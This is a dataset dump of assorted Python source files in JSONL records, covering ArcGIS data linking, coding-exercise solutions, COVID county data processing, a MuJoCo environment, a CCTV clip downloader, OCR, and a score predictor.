self.ReqFields.append(self.reqFields[rf][0])\n return present_fields\n # This code can be added to add required fields, without this code the tool takes the gdb schema as-is.\n # if self.reqFields[rf][0] not in self.fields:\n # AddField_management(self.fc, field_name=self.reqFields[rf][0], field_type=self.reqFields[rf][1],\n # field_length=self.reqFields[rf][2], field_alias=self.reqFields[rf][3],\n # field_domain=self.reqFields[rf][4])\n\n def excel_date_convert(self, xldate):\n try:\n date = (\n datetime.datetime(1899, 12, 30) + datetime.timedelta(days=int(xldate))\n )\n return date # .strftime('%d%m%Y')\n except:\n return datetime.datetime(1111, 11, 11) # .strftime('%d%m%Y')\n\n def error_message(self, field, row):\n return AddMessage(\"The {0} field was not populated for feature {1}. [{2}]\".format(str(field), str(row), self.fc))\n\n def inputData(self):\n # When adding a field it must be added to this list, and the rfield index's updated in inputData().\n if self.IDPK()[0]:\n rpuid_delim = AddFieldDelimiters(self.fc, 'rpuid')\n rfields = self.otherFields()\n if False in rfields:\n missing = []\n index = 0\n for f in rfields:\n if not f:\n missing.append(self.reqFields[0][index])\n index+=1\n AddMessage(\"The following fields are missing in {0}: {1}\".format(self.fc, missing))\n if \"rpuid\" not in self.fields:\n AddMessage(\"{1} field is missing from feature class: {0}\".format(self.fc,\"rpuid\"))\n return False\n\n with UpdateCursor(self.fc, field_names=self.pflds,\n where_clause=\"{0} is not Null\".format(rpuid_delim)) as cursor:\n for r in cursor:\n try:\n if r[0].isdigit():\n try:\n hData = self.pullData(r[0])\n if hData[0] == \"\":\n continue\n except Exception as e:\n AddMessage(\"Something is wrong with the HQIIS file.\")\n AddMessage(e.message)\n sys.exit()\n try:\n r[1] = str(hData[5]) + \"_\" + str(hData[9])\n except:\n self.error_message(\"IDPK\", r[0])\n try:\n if rfields[0]:\n if hData[11].isdigit():\n r[2] = self.excel_date_convert(hData[11])\n else:\n self.error_message(\"dateAcquired\", r[0])\n except Exception as e:\n AddMessage(e.message)\n self.error_message(\"dateAcquired\", r[0])\n try:\n if rfields[1]:\n if hData[37].isdigit():\n r[3] = hData[37]\n else:\n self.error_message(\"rpaQualityRate\", r[0])\n except Exception as e:\n AddMessage(e.message)\n self.error_message(\"rpaQualityRate\", r[0])\n try:\n if rfields[2]:\n if hData[35].isdigit() and hData[36].isdigit():\n r[4] = str(int(hData[35]) + int(hData[36]))\n else:\n self.error_message(\"numberOfLevels\", r[0])\n except:\n self.error_message(\"numberOfLevels\", r[0])\n try:\n if rfields[3]:\n r[5] = hData[23]\n except:\n self.error_message(\"typeCode\", r[0])\n try:\n if rfields[4]:\n r[6] = hData[19]\n except:\n self.error_message(\"operationalStatus\", r[0])\n try:\n if rfields[5]:\n if hData[10].isdigit():\n r[7] = self.excel_date_convert(hData[10]).strftime('%d%m%Y')\n else:\n self.error_message(\"placedInServiceDate\", r[0])\n except:\n self.error_message(\"placedInServiceDate\", r[0])\n try:\n if rfields[6]:\n r[8] = str(hData[27])\n except:\n self.error_message(\"predominantDesignUse\", r[0])\n try:\n if rfields[7]:\n r[9] = str(hData[28])\n except:\n self.error_message(\"predominantDesignUseText\", r[0])\n try:\n if rfields[8]:\n r[10] = str(hData[21])\n except:\n self.error_message(\"interestType\", r[0])\n try:\n if rfields[9]:\n r[11] = str(hData[9])\n except:\n self.error_message(\"facilityNumber\", r[0])\n try:\n if rfields[10]:\n r[12] = str(hData[5])\n except:\n self.error_message(\"rpsuid\", r[0])\n try:\n if rfields[11]:\n r[13] = str(hData[12])\n except:\n self.error_message(\"sdsFeatureName\", r[0])\n cursor.updateRow(r)\n self.recordsUpdated += 1\n except Exception as e:\n AddMessage(e.message)\n AddMessage(sys.exc_info()[2].tb_lineno)\n\n self.fix_duplicate_idpk()\n\n def countRecords(self):\n records = 0\n with SearchCursor(self.fc, field_names=\"OBJECTID\") as cursor:\n for r in cursor:\n records += 1\n return records\n\n\ndef rootFCWork():\n \"\"\"feature classes outside of datasets\"\"\"\n rootRecordsUpdated = 0\n rootTotalRecords = 0\n env.workspace = inDB\n rootFCs = ListFeatureClasses()\n for FC in rootFCs:\n newFeatureClass = Link(FC, hqiis_dbf)\n newFeatureClass.inputData()\n rootTotalRecords += newFeatureClass.countRecords()\n rootRecordsUpdated += newFeatureClass.recordsUpdated\n return [rootRecordsUpdated, rootTotalRecords]\n\n\ndef insideFCWork():\n \"\"\"feature classes inside datasets\"\"\"\n insideRecordsUpdated = 0\n insideTotalRecords = 0\n env.workspace = inDB\n datasets = ListDatasets(feature_type=\"Feature\")\n for dataset in datasets:\n insideFCs = ListFeatureClasses(feature_dataset=dataset)\n for FC in insideFCs:\n newFeatureClass = Link(FC, hqiis_dbf)\n newFeatureClass.inputData()\n insideTotalRecords += newFeatureClass.countRecords()\n insideRecordsUpdated += newFeatureClass.recordsUpdated\n return [insideRecordsUpdated, insideTotalRecords]\n\n\ndef makeHQIIS_DBF(excel):\n try:\n ExcelToTable_conversion(excel, os.path.split(excel)[0] + os.sep + \"HQIIS_table.dbf\")\n return \"HQIIS_table.dbf\"\n except Exception as e:\n AddMessage(\"Failed to Convert HQIIS excel file.\")\n sys.exit(AddMessage(e.message))\n\n# if __name__ == \"__main__\":\n# makeHQIIS_DBF(inHQIIS)\n# hqiis_dbf = os.path.split(inHQIIS)[0] + os.sep + \"HQIIS_table.dbf\"\n# try:\n# root = rootFCWork()\n# inside = insideFCWork()\n# recordsUpdated = root[0] + inside[0]\n# recordsTotal = root[1] + inside[1]\n# AddMessage(\"Records updated: {0}\".format(recordsUpdated))\n# AddMessage(\"Records in database: {0}\".format(recordsTotal))\n# finally:\n# Delete_management(in_data=hqiis_dbf)\n","sub_path":"USAR_add_in/Install/Data/GP_tools/HQIIS_link.py","file_name":"HQIIS_link.py","file_ext":"py","file_size_in_byte":16250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"313933917","text":"# 당근 수확\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n farm = list(map(int, input().split()))\n\n idx = 0\n minV = 1000000\n for i in range(1, N):\n left = sum(farm[:i])\n right = sum(farm[i:])\n val = left-right\n if val < 0:\n val = -val\n if val < minV:\n idx = i\n minV = val\n print(f'#{tc} {idx} {minV}')","sub_path":"191007/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"590965009","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@author: zhang\n@time: 2017-03-10\n\"\"\"\n\n\ndef calc(n):\n print(n)\n if n/2 > 1:\n return calc(n/2)\n\n\ndef Fibonacci(arg1, arg2, stop):\n if arg1 == 0:\n print(arg1, arg2)\n arg3 = arg1 + arg2\n print(arg3)\n if arg3 < stop:\n Fibonacci(arg2, arg3, stop)\n\nFibonacci(0,1,5000)","sub_path":"s12day4/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"484597335","text":"\"\"\"\nMerge two sorted arrays and return it as a new array.\n# NOTE: YOU CAN NOT USE ANY SORTING LIBRARIES\n\"\"\"\n\n\ndef merge_two_list_helper(list1, list2):\n len1 = len(list1)\n len2 = len(list2)\n if (len1 == 0 or len2 == 0 ) == True:\n \tfinal_list = list1 + list2\n else:\n \tif list1[len1-1] <= list2[0]:\n \t\tfinal_list = list1 + list2\n \telif list2[len2-1] <= list1[0]:\n \t\tfinal_list = list2 + list1\n \telse:\n\t \tif list1[0] > list2[0]:\n\t \t\tfinal_list = [list2[0], \n\t \t\tlist1[0]] + merge_two_list_helper(list1[1:len1], list2[1:len2])\n\t \telse:\n\t \t\tfinal_list =[list1[0], \n\t \t\tlist2[0]] + merge_two_list_helper(list1[1:len1], list2[1:len2])\n return final_list\n\n\n# DO NOT CHANGE THIS FUNCTION\ndef merge_two_list(list1, list2):\n\treturn merge_two_list_helper(list1, list2)\n\n\n# test cases\ndef main():\n list1 = [1,3,5]\n list2 = [2,4,6]\n print(\"merging [1,3,5] and [2,4,6]......\")\n print(\"expected result is [1,2,3,4,5,6]\")\n print(\"your output is {}\".format(merge_two_list(list1, list2)))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"problem_4/Fellow Codes Go Here/Lily_Xu.py","file_name":"Lily_Xu.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"107392369","text":"import json\nimport os\n\n# info, timelineのいずれにしかないファイルの特定\njson_info_directory = 'C:/output/game/info'\njson_info_file_names = os.listdir(json_info_directory)\n\njson_timeline_directory = 'C:/output/game/timeline'\njson_timeline_file_names = os.listdir(json_timeline_directory)\n\nset_diff = set(json_info_file_names) ^ set(json_timeline_file_names)\n\nprint(set_diff)","sub_path":"2nd - How to be bronze from iron/pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"533240364","text":"# Prompt: https://leetcode.com/problems/peak-index-in-a-mountain-array/\nclass Solution:\n def peakIndexInMountainArray(self, A: List[int]) -> int:\n peak = -1\n for i in range(1, len(A)-1):\n #check if it's bigger than A[i-1]\n if A[i] > A[i-1] and A[i] > A[i+1]:\n #check if a peak is already set\n if peak is not -1:\n return None\n else:\n peak = i\n if peak is not -1:\n return peak\n else:\n return None\n","sub_path":"0. Easy/0852. Peak Index in a Mountain Array/mountain.py","file_name":"mountain.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"103936721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 22 10:37:39 2020\n\n@author: benja\n\"\"\"\n\nimport pandas as pd\nimport requests\nimport json\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom scipy.stats import linregress\n\n#define state_abbrvs\nwith open(os.path.join('data', 'state_abbrvs.txt')) as f:\n state_abbrvs=json.loads(f.read())\n\n#define state_fips \nwith open(os.path.join('data', 'state_fips.txt')) as f:\n state_fips=json.loads(f.read())\n\n\n \ndef abbrv_to_fips(abbrv):\n 'Give a state abbreviation.''' \n return state_fips[state_abbrvs[abbrv]]\n\ndef NYT_fixes(df):\n '''Fix NYTimes dataset for two issues.\n NYC and Kansas City'''\n #fix issue with New York City: assign County Fips of 999 to whole city\n df['fips']=np.where((df['county']==\"New York City\"), 36999, df['fips']) \n #fix issue with Kansas City assign County Fips of 999 to whole city\n df['fips']=np.where((df['county']==\"Kansas City\"), 29999, df['fips']) #fix issue with Kansas City\n df.dropna(subset=['fips'], inplace=True)\n df['fips']=df['fips'].astype(int)\n return df\n\ndef load_NYTCOVID():\n '''Load current county data from NYT covid as dataframe'''\n return NYT_fixes(pd.read_csv('https://github.com/nytimes/covid-19-data/raw/master/us-counties.csv'))\n\n\ndef retrieve_covidTracker():\n '''Load current state-level data from Covid-Tracker Website and return as dataframe'''\n response=requests.get('https://covidtracking.com/api/states/daily')\n return pd.DataFrame(json.loads(response.text))\n\n\n\ndef censusfixes(df):\n '''Make fixes to census data to fit with anamolies in NYT data.'''\n \n nyboroughs=df[df['county_fips'].isin([36005, 36047, 36061, 36081, 36085])]\n nycpop=nyboroughs['POP'].sum()\n nyc_density=((nyboroughs['POP']*nyboroughs['DENSITY']).sum())/nycpop\n df=df.append({'state': 36, \n 'county':999, \n 'county_fips': 36999, \n \"DENSITY\":nyc_density, \n 'POP': nycpop}, \n ignore_index=True)\n #create separate county for kansas city\n df=df.append({'state': 29, \n 'county':999, \n 'county_fips': 29999,\n \"DENSITY\": 1400, #est from wikipedia\n 'POP': 491918 }, #est from wikipedia\n ignore_index=True)\n return df\n \n\n\n\ndef loadCensus():\n '''Load and format census data for: Population and population density from Census.\n Return as a dataframe'''\n response=requests.get('https://api.census.gov/data/2019/pep/population?get=DENSITY&POP&for=county:*')\n data=json.loads(response.text)\n df= pd.DataFrame(data[1:], columns=data[0])\n df['county_fips']=(df['state']+df['county']).astype(int) #make combined county fips code\n df['POP']=df['POP'].astype(int)\n df.dropna(subset=['DENSITY'])\n df[\"DENSITY\"]=df[\"DENSITY\"].astype(float)\n return censusfixes(df)\n\ncountyPops = loadCensus() \n\n\n \n\ndef getMostCurrentRecords(df, datecol, geo_col):\n '''Make a dataFrame of most current records for each geography \n Input df: dataframe\n datecol: name of column with dates.\n geo_col: column with geography names'''\n newDF=pd.DataFrame()\n for name in df[geo_col].unique():\n subset=df[df[geo_col]==name]\n newDF=newDF.append(\n subset[subset[datecol]==subset[datecol].max()])\n return newDF\n\n \n\ndef makeCountyDF():\n '''Get data from NYT covid and from census. \n Merge Data Together\n Add per capita columns.'''\n countyCOVID=load_NYTCOVID()\n df=countyPops.merge(countyCOVID, left_on='county_fips', right_on='fips', how='left')\n df['date']=pd.to_datetime(df['date'])\n df=df.rename(columns={'POP': 'population'})\n df['cases_per_cap']=df['cases']/df['population']\n df['deaths_per_cap']=df['deaths']/df['population']\n return df\n\n\n\ndef fill_blank_dates_counties(df):\n '''Fill in dates where county is not present with 0s \n for cases and deaths in absolute and per-capita terms.'''\n counties=df['fips'].unique()\n to_add=[]\n for county in counties:\n county_data={column: df[df['fips']==county][column].min() for column in \n ['population', 'county_x', 'state_x', 'fips', 'county_y', 'state_y']}\n for date in df['date'].unique():\n that_date=df[df['date']==date]\n if county not in that_date['fips'].unique():\n to_add.append({**county_data, **{'deaths':0, 'cases':0, 'date': date, \n 'cases_per_cap':0, 'deaths_per_cap':0}})\n df=df.append(to_add)\n return df\n\ndef logTransform(df,xcol, ycol):\n '''Drop 0 values and return x and y log transformed.'''\n non_0=df[(df[xcol]>0) & (df[ycol]>0)].dropna()\n return np.log(non_0[xcol]), np.log(non_0[ycol])\n\n\ndef plot(df, x, y, loglog=False):\n '''Plot x and y from a dataframe, excluding any 0 or NA values.\n Plot a trendline, print its slope and r_value. \n Return slope and intercept.\n If loglog=True, plot log(x) log(y)'''\n \n if loglog:\n x, y=logTransform(df, x,y)\n else:\n df=df[(df[x]>0) & (df[y]>0)].dropna()\n x=df[x]\n y=df[y]\n \n slope, intercept, r_value, p_value, std_err=linregress(x,y)\n print(slope, r_value)\n plt.scatter(x, y)\n plt.plot(x, x*slope+intercept, '-k')\n return slope, intercept\n\n\n\n\ndef prepCBSAs(cbsa_df):\n def primary_code(row):\n '''Assign PSA code to a row in the df'''\n if not (str(row['CSA Code'])=='nan') or str(row['CSA Code'])=='':\n return row['CSA Code']\n else:\n return row['CBSA Code']\n \n def primary_name(row):\n '''Assign PSA Name to a row in the df'''\n if not (str(row['CSA Title'])=='nan') or str(row['CSA Title'])=='':\n return row['CSA Title']\n else:\n return row['CBSA Title']\n \n \n \n cbsa_df=cbsa_df.dropna(subset=['FIPS State Code'])\n cbsa_df['full_fips']=(cbsa_df['FIPS County Code']+cbsa_df['FIPS State Code']*1000).astype(int)\n \n #correction for NYC data: In NYT county Data, all boroughs merged into\n #one county called \"New York City\"\n cbsa_df=cbsa_df.append({'CBSA Code': 35620, \n 'Metropolitan/Micropolitan Statistical Area': 'Metropolitan Statistical Area',\n 'full_fips':36999, \n 'Central/Outlying County': 'Central', \n 'CBSA Title': 'New York-Newark-Jersey City, NY-NJ-PA',\n 'CSA Title': 'New York-Newark, NY-NJ-CT-PA',\n 'CSA Code': 408}, ignore_index=True)\n \n #correction for KC data: all cases/deaths in any County in Kansas City MO\n #Are recorded as occuring in \"Kansas City\"\n #But all of these counties have areas outside of KC\n cbsa_df=cbsa_df.append({'CBSA Code': 28140, \n 'Metropolitan/Micropolitan Statistical Area': 'Metropolitan Statistical Area',\n 'full_fips':20999, \n 'Central/Outlying County': 'Central', \n 'CBSA Title': 'Kansas City, MO-KS',\n 'CSA Title': 'Kansas City-Overland Park-Kansas City, MO-KS',\n 'CSA Code':312\n }, ignore_index=True\n )\n \n #assign PSA codes and titles\n cbsa_df['PSA Code']=cbsa_df.apply(primary_code, axis=1)\n cbsa_df['PSA Title']=cbsa_df.apply(primary_name, axis=1)\n return cbsa_df\n\n\ndef df_by_CBSA(county_df, kind='CBSA'):\n '''Make a dataframe that has data organized by Census Bureau Statistical Areas.\n Pass the dataframe that has the county data.\n For kind: pass CBSA, CSA or PSA. \n CBSA: Aggregate by core-based statistical area (Metropolitan or Micropolitan)\n CSA: Aggregate by Combined Statistical Area.\n PSA: Aggregate by Primary statistical Area: CSA if applicable, CBSA if not.\n ''' \n \n groupby_column=f'{kind} Title'\n \n df=pd.read_csv(os.path.join('data', 'metro_areas.csv'), encoding='latin-1')\n df=prepCBSAs(df)\n \n area_pops=df.merge(countyPops, left_on='full_fips', right_on='county_fips', how='left')\n area_pops=area_pops[area_pops['full_fips'].isin([36999, 20999])==False]\n area_pops=area_pops.groupby([groupby_column])['POP'].sum().reset_index()\n \n \n \n \n county_df=county_df.merge(df, left_on='fips', right_on='full_fips', how='outer')\n \n #make dataframe with area totals by date\n groups=county_df.groupby([groupby_column, 'date'])\n gdf=pd.DataFrame([ groups['cases'].sum(), groups['deaths'].sum()]).T\n gdf=gdf.reset_index()\n gdf=gdf.merge(area_pops, right_on=groupby_column, left_on=groupby_column, how='outer')\n gdf=gdf.rename(columns={'POP': 'population'})\n gdf['cases per thousand']=gdf['cases']/gdf['population']*1000\n \n \n return gdf\n\nif __name__=='__main__':\n df=makeCountyDF()\n df.to_csv(os.path.join('data', 'covid_by_county.csv'))\n CBSA_df=df_by_CBSA(df)\n CBSA_df.to_csv(os.path.join('data', 'covid_by_CBSA.csv'))","sub_path":"data_mgmt.py","file_name":"data_mgmt.py","file_ext":"py","file_size_in_byte":8959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"615656582","text":"import numpy as np\n\nfrom gym.envs.mujoco import HumanoidEnv as HumanoidEnv\n\ndef mass_center(model, sim):\n mass = np.expand_dims(model.body_mass, 1)\n xpos = sim.data.xipos\n return (np.sum(mass * xpos, 0) / np.sum(mass))\n\n\nclass HumanoidGoalEnvNDone(HumanoidEnv):\n\n def __init__(self, goal=None):\n if goal is None:\n goal = np.zeros(2)\n self._goal = goal\n super(HumanoidGoalEnvNDone, self).__init__()\n\n def step(self, action):\n self.do_simulation(action, self.frame_skip)\n pos_after = mass_center(self.model, self.sim)[:2]\n\n goal_reward = -np.sum(np.abs(pos_after - self._goal))\n\n data = self.sim.data\n \n quad_ctrl_cost = 0.1 * np.square(data.ctrl).sum()\n quad_impact_cost = .5e-6 * np.square(data.cfrc_ext).sum()\n quad_impact_cost = min(quad_impact_cost, 10)\n reward = goal_reward - quad_ctrl_cost - quad_impact_cost\n done = False\n\n return self._get_obs(), reward, done, dict(goal_reward=goal_reward,\n reward_quadctrl=-quad_ctrl_cost,\n reward_impact=-quad_impact_cost,\n achieved=pos_after)\n\n def _get_obs(self):\n data = self.sim.data\n return np.concatenate([data.qpos.flat,\n data.qvel.flat,\n data.cinert.flat,\n data.cvel.flat,\n data.qfrc_actuator.flat,\n data.cfrc_ext.flat])\n\n def set_goal(self, goal):\n self._goal = goal\n self.reset()\n","sub_path":"no_transition_relabelling/env/humanoid_goal_ndone.py","file_name":"humanoid_goal_ndone.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"221366399","text":"#2019.07.23\n#https://programmers.co.kr/learn/courses/30/lessons/42888\n\n\ndef solution(record):\n user_dict = {}\n for msg in record:\n cur_msg = msg.split(\" \")\n if cur_msg[0] == \"Enter\" or cur_msg[0] == \"Change\":\n user_dict[cur_msg[1]] = cur_msg[2]\n \n answer = []\n for msg in record:\n cur_msg = msg.split(\" \")\n if cur_msg[0] == \"Enter\":\n answer.append(user_dict[cur_msg[1]]+\"님이 들어왔습니다.\")\n if cur_msg[0] == \"Leave\":\n answer.append(user_dict[cur_msg[1]]+\"님이 나갔습니다.\")\n \n return answer","sub_path":"Algorithm/OpenChatRoom.py","file_name":"OpenChatRoom.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"496590529","text":"import requests\nimport datetime\nimport os\nimport schedule\nimport time\n\n\ndef download_file(cctv, min_back,unix_timestamp):\n ###Create directory if !exist\n print(datetime.datetime.now())\n directory= \"new_videos\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n for vid in cctv:\n \n ###get unix time\n current_time = datetime.datetime.now(datetime.timezone.utc)\n \n sec=min_back * 60 # e.g. 5 min * 60 seconds\n unix_time = int(unix_timestamp - (sec))\n u_time= str(unix_time) + \"-\" + str(sec) + \".mp4\"\n \n url= vid + \"/archive-\" + u_time \n\n ###download video\n local_filename =\"new_videos/\" + vid.split(\".co.id/\")[1] + \"-\" + u_time \n \n r = requests.get(url, stream=True)\n \n with open(local_filename, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024): \n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n \n return datetime.datetime.now()\n\ndef job():\n ###func takes in list and duration of video in minutes\n current_time = datetime.datetime.now(datetime.timezone.utc)\n unix_timestamp = current_time.timestamp()\n print(download_file(cctv,5,unix_timestamp)) \n \n\t\n \n####list of all cameras\ncctv= [\"http://\", \"http://\", \"http://\", \"http://\", \"http://\", \"http://\", \"http://\"]\n\nschedule.every(5).minutes.do(job)\n\nwhile 1:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"scratch/scripts/vid_downloader_our_cams.py","file_name":"vid_downloader_our_cams.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"566551226","text":"import pytesseract\r\nimport os\r\nimport filetype\r\nimport fitz\r\n\r\nclass OCR:\r\n def __init__(self):\r\n self.custom_config = r'--oem 3 --psm 6'\r\n\r\n def readimage(self,address):\r\n kind = filetype.guess(address)\r\n if(kind.extension == 'pdf'):\r\n imageAddress = \"image\"\r\n self.pdf_image(address,imageAddress,5,5,0)\r\n s = pytesseract.image_to_string(imageAddress+\".png\", config=self.custom_config)\r\n os.remove(imageAddress+\".png\")\r\n else:\r\n s = pytesseract.image_to_string(address, config=self.custom_config)\r\n\r\n return s\r\n\r\n def pdf_image(self,pdfPath,imgPath,zoom_x,zoom_y,rotation_angle):\r\n pdf = fitz.open(pdfPath)\r\n for pg in range(0, pdf.pageCount):\r\n page = pdf[pg]\r\n trans = fitz.Matrix(zoom_x, zoom_y).preRotate(rotation_angle)\r\n pm = page.getPixmap(matrix=trans, alpha=False)\r\n pm.writePNG(imgPath+\".png\")\r\n pdf.close()\r\n\r\n\r\n\r\n# Adding custom options\r\n\r\nif __name__ == \"__main__\":\r\n cc = OCR()\r\n print(cc.readimage(\"cvexample2.pdf\"))\r\n\r\n","sub_path":"AvanadeIHP/Algorithm/ocr.py","file_name":"ocr.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"18879863","text":"# -*- coding: utf-8 -*-\nimport simplejson as json\nimport string\nimport argparse\nimport scorefetch\nimport time\n\nclass Predictor(object):\n\tdef __init__(self):\n\t self.last = 0\n\t self.data = []\t\t\n\t self.eventData = json.loads(scorefetch.getScore())\n\t self.bad = [27]\t\t\n\t\t\n\n\tdef daychange(self, scorearray, olddays, days, type):\n\t\tresult = scorearray\n\t\tdeltaarray = [scorearray[i]-scorearray[i-2] for i in range(2,len(scorearray)-5)]\n\t\tdelta2array = [deltaarray[i]-deltaarray[i-1] for i in range(1,len(deltaarray))]\n\t\tmindelta2 = 100000\n\t\tminpos = 0\n\t\ttypebase = 4\n\t\tif type == 'classic':\n\t\t\ttypebase = 10\n\t\tfor i in range(4, len(delta2array)-typebase):\n\t\t\tdelta2 = int(1.5*abs(delta2array[i]))+abs(delta2array[i+1])+int(0.5*abs(delta2array[i+2]))\n\t\t\tif delta2 < mindelta2:\n\t\t\t\tminpos = i\n\t\t\t\tmindelta2 = delta2\n\t\t#print olddays, days,len(scorearray),len(deltaarray),len(delta2array)\n\t\toffset = deltaarray[minpos+1]\n\t\tif days == olddays+1:\n\t\t\tresult.insert(minpos+4, scorearray[minpos+2]+offset)\n\t\t\tresult.insert(minpos+5, scorearray[minpos+3]+offset)\n\t\t\tfor i in range(minpos+6, len(result)):\n\t\t\t\tresult[i] += offset\n\t\telif days == olddays-1:\n\t\t\tdel result[minpos+3]\n\t\t\tdel result[minpos+3]\n\t\t\tfor i in range(minpos+3, len(result)):\n\t\t\t\tresult[i] -= offset\n\t\treturn result\n\n\tdef calcusimilarity(self, eventid1, eventid2, pos):\n\t\t#print eventid1,eventid2,pos\n\t\tdistance = [1,1]\n\t\t#eventid1n = string.atoi(eventid1)\n\t\t#eventid2n = string.atoi(eventid2)\n\t\tfor i in range(0,pos+1):\n\t\t\t#print i,self.eventData[str(eventid1)]['score'][0][i],self.eventData[str(eventid2)]['score'][0][i]\n\t\t\tdistance[0] = 0.8*distance[0]+1.2**abs(eventid1-eventid2)*abs(self.eventData[str(eventid1)]['score'][0][i]-self.eventData[str(eventid2)]['score'][0][i])**2\n\t\t\tdistance[1] = 0.8*distance[1]+1.2**abs(eventid1-eventid2)*abs(self.eventData[str(eventid1)]['score'][1][i]-self.eventData[str(eventid2)]['score'][1][i])**2\n\t\treturn [1.0/(distance[0]/10000000.0),1.0/(distance[1]/10000000.0)]\n\n\tdef predict(self, eventid, pos, change):\n\t\tpredictevent = self.eventData[str(eventid)]\n\t\ttotalweight = [0,0]\n\t\ttotalpredict = [0,0]\n\t\t#print predictevent\n\t\tcurrent = [predictevent['score'][0][pos],predictevent['score'][1][pos]]\n\t\tif pos > 1:\n\t\t\tcurrentdelta = [current[0]-predictevent['score'][0][pos-2],current[1]-predictevent['score'][1][pos-2]]\n\t\telse:\n\t\t\tcurrentdelta = [1,1]\n\t\tfor index in self.eventData:\n\t\t\tif string.atoi(index) in self.bad:\n\t\t\t\tcontinue\n\t\t\tevent = self.eventData[index]\n\t\t\tif event['id'] < eventid and abs(event['days']-predictevent['days']) <= 1 \\\n\t\t\tand event['type'] == predictevent['type']:\n\t\t\t\tif abs(event['days']-predictevent['days']) == 1 and change:\n\t\t\t\t\tevent['score'][0] = self.daychange(event['score'][0],event['days'],predictevent['days'],predictevent['type'])\n\t\t\t\t\tevent['score'][1] = self.daychange(event['score'][1],event['days'],predictevent['days'],predictevent['type'])\n\t\t\t\tevent['predict'] = [0]*2\n\t\t\t\tif False:\n\t\t\t\t\tevent['weight'] = [1.0, 1.0]\n\t\t\t\telse:\n\t\t\t\t\tevent['weight'] = self.calcusimilarity(eventid,string.atoi(index),pos)#[1.0,1.0]\n\t\t\t\t\tevent['weight'][0] *= 0.8**abs(eventid-event['id'])\n\t\t\t\t\tevent['weight'][1] *= 0.8**abs(eventid-event['id'])\n\t\t\t\t\tif abs(event['days']-predictevent['days']) == 1:\n\t\t\t\t\t\tevent['weight'][0] *= 0.2\n\t\t\t\t\t\tevent['weight'][1] *= 0.2\n\t\t\t\t\n\t\t\t\tif pos >1 and False:\n\t\t\t\t\tdelta0 = event['score'][0][pos]-event['score'][0][pos-2]\n\t\t\t\t\tdelta1 = event['score'][1][pos]-event['score'][1][pos-2]\n\t\t\t\t\tevent['predict'][0] = current[0]+int(1.0*(event['score'][0][-1]-event['score'][0][pos])*currentdelta[0]/delta0)\n\t\t\t\t\tevent['predict'][1] = current[1]+int(1.0*(event['score'][1][-1]-event['score'][1][pos])*currentdelta[1]/delta1)\n\t\t\t\telse:\n\t\t\t\t\tevent['predict'][0] = int(1.0*event['score'][0][-1]*(1.0*current[0]/event['score'][0][pos]))\n\t\t\t\t\t#print event['score'][0], predictevent['score'][0]\n\t\t\t\t\tevent['predict'][1] = int(1.0*event['score'][1][-1]*(1.0*current[1]/event['score'][1][pos]))\n\t\t\t\ttotalpredict[0] += event['weight'][0]*event['predict'][0]\n\t\t\t\ttotalpredict[1] += event['weight'][1]*event['predict'][1]\n\t\t\t\ttotalweight[0] += event['weight'][0]\n\t\t\t\ttotalweight[1] += event['weight'][1]\n\t\t\t\t# if not args.all or pos == len(self.eventData[args.eventid]['score'][0])-1:\n\t\t\t\t\t# print event['id'], event['character'],event['predict'], event['weight']\n\t\t# print int(totalpredict[0]/totalweight[0]), int(totalpredict[1]/totalweight[1])\n\t\tnotchange = False\n\t\treturn [int(totalpredict[0]/totalweight[0]), int(totalpredict[1]/totalweight[1])]\n\n\tdef getPredict(self): \n\t\tif(time.time() - self.last >= 6000):\n\t\t\tf = open(\"predict.json\", \"r\")\n\t\t\tconf = json.loads(f.read())\n\t\t\teventid = conf['eventid']\n\t\t\tdata = []\n\t\t\tchange = True\n\t\t\tif True:\n\t\t\t\tfor i in range(0, len(self.eventData[eventid]['score'][0])):\n\t\t\t\t\tdata = self.predict(string.atoi(eventid), i, change)\n\t\t\t\t\tchange = False\n\t\t\tself.time = time.time()\n\t\t\tself.obj = data\n\t\treturn self.obj\n","sub_path":"Moto/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"385517162","text":"# Copyright 2018/2019 The RLgraph authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# 